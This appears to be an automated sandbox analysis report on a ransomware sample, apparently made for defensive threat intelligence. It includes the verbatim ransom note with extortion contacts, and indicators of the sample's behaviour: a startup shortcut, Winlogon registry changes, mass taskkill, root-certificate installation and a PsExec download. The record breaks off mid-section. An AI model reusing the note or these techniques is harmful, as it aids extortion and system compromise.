c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c

Analysis

max time kernel
118s
max time network
142s
platform
windows7_x64
resource
win7-en-20211014
submitted
29-10-2021 15:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Size

203KB
MD5

cefd366a2c000d9bbbd35dfd0a73311d
SHA1

0864171c1e033067b04317979803d97f1c90c85b
SHA256

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c
SHA512

5f43b27b0495afb6ded495816405efe4a0d77b9991f56b7bfd09cd56d3ae890ec8dc2461a1806b2131edeaafc15d3478b471d1ef0376f9f78128eff539451040

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\HOW_TO_RECOVER_MY_FILES.txt

Ransom Note

ALL YOUR FILES HAS BEEN ENCRYPTED! ALL YOUR FILES HAVE NOW THE .LOCKED EXTENSION! TO DE-CRYPT YOUR FILES, CONTACT US HERE: 1- Download qTox >>> https://tox.chat/download.html 2- Install qTox and make a profile, after you have done this: 3- Use this TOX-ID (Copy + Paste): FF45ED6FCE4433D273E34DA1C22AC1B0290973082BE068066D5EDF6C62EF39500A691BDE33B9 and make a friend request, after 5 minutes, you will be in contact with our negotiator. If you want proof, attach 2-3 encrypted files together with the Key ID (you can find the Key-ID in the How-To-Recover-My-Files document on your Desktop,) less then 5Mb each, non-archived and your files should not contain valuable information, like Databases, back-ups, large excel sheets, etc. You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail! Alternatively, please get in touch with the negotiator at the following email address: [email protected] Key Identifier: LjqyEfdX+jDDhC1aV62UQ5a6cCb1cZuUgN8e29VcKpyy9AL/OMcz9OSgswuWxkJPfxKIqqDjfCJeGm4LD3BIX+cUVdAd4+f5mc0KOoWxSTmJ4psJ5uPUqOdPXo5SkWzQBDxR4QVZ0JDdlGj974yH5UpDQAuU6f8RQ39IBFe2sUzhywIPEQE6EKUEXiNVjKKkZ0d4oeAxDTj6xbVJZEHqM+hxA40Smdr7J/Io3AqlLesGRXDR2fL9SXblR5FoQpWQRDKTjWgDOG4/U4XsCHPX7nvkeXMEPdZJhGV+HGMRLPBhy+uqoYMZQLn7lksgm4Yln/FhJ5LobgEQXZoAt3Du6QizlzPbtiqCDtfbaZ3AfBoo9B4g98N/XO5QsfRiZo7sWD4kQGJGTtUPFRNTJTOddS32u6jAFO/ZhoVrgs+wKBnQql0qaCH3rn/WxKiiXBMvzT69/BUIiiMkonv0qDlZEcbajIhoKTOxJLyVrUPOfzU6aSfbCgZhsd/s5AKFegirzC1wm6E14uh5U6300Wpex81/g+UdGgCyVU19Y/6+ADFLq3idJlZM2X+Sw6gu8i2xgKmRomRrvCIcd0bSx4H/fpy3dXycVxS/TUhniWiaoKboyIl20t1LfWN+JiDz2JB1hn9rpe/ISEu07WLjoxaQjh98aqnEBvRLsJ+o0EOJOpE=

Emails

[email protected]

URLs

https://tox.chat/download.html

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

21 828 mshta.exe
23 828 mshta.exe
25 828 mshta.exe
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 11 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

flow	pid	process
21	828	mshta.exe
23	828	mshta.exe
25	828	mshta.exe

description	flow	ioc
HTTP URL	11	http://live.sysinternals.com/PsExec.exe

Modifies extensions of user files 11 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CloseExport.crw => C:\Users\Admin\Pictures\CloseExport.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\CompressUnpublish.png => C:\Users\Admin\Pictures\CompressUnpublish.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\OpenAdd.tiff	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\OpenAdd.tiff.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\ResolveRevoke.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\SearchJoin.png => C:\Users\Admin\Pictures\SearchJoin.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\CloseExport.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\CompressUnpublish.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\OpenAdd.tiff => C:\Users\Admin\Pictures\OpenAdd.tiff.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File renamed	C:\Users\Admin\Pictures\ResolveRevoke.crw => C:\Users\Admin\Pictures\ResolveRevoke.crw.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened for modification	C:\Users\Admin\Pictures\SearchJoin.png.LOCKED	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

948 cmd.exe

pid	process
948	cmd.exe

Drops startup file 1 IoCs

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

description	ioc	process
File opened (read-only)	\??\I:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\P:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\G:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\J:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\L:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\V:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\E:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\T:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\N:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\U:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\A:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\F:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\H:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\Z:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\Q:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\Y:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\W:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\S:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\K:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\X:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\B:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\M:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\R:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
File opened (read-only)	\??\O:	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files are secured, please read the text note located in your desktop..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1292	taskkill.exe
1828	taskkill.exe
1916	taskkill.exe
1724	taskkill.exe
1712	taskkill.exe
1716	taskkill.exe
1076	taskkill.exe
1228	taskkill.exe
1044	taskkill.exe
1476	taskkill.exe
1556	taskkill.exe
1628	taskkill.exe
1924	taskkill.exe
888	taskkill.exe
1908	taskkill.exe
1112	taskkill.exe
984	taskkill.exe
1776	taskkill.exe
912	taskkill.exe
1188	taskkill.exe
952	taskkill.exe
1060	taskkill.exe
2024	taskkill.exe
1592	taskkill.exe
1916	taskkill.exe
1728	taskkill.exe
1496	taskkill.exe
1912	taskkill.exe
1164	taskkill.exe
548	taskkill.exe
1768	taskkill.exe
1940	taskkill.exe
1688	taskkill.exe
1920	taskkill.exe
888	taskkill.exe
1548	taskkill.exe
1164	taskkill.exe
1612	taskkill.exe
2032	taskkill.exe
1588	taskkill.exe
288	taskkill.exe
1376	taskkill.exe
1888	taskkill.exe
1676	taskkill.exe
1768	taskkill.exe
1504	taskkill.exe
1680	taskkill.exe
1276	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1064 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1064	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mshta.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1232 PING.EXE

pid	process
1232	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

pid	process
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mshta.exe

pid process

828 mshta.exe

pid	process
828	mshta.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	1292
Token: SeDebugPrivilege	912	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1228	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	288	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1060	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

pid	process
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

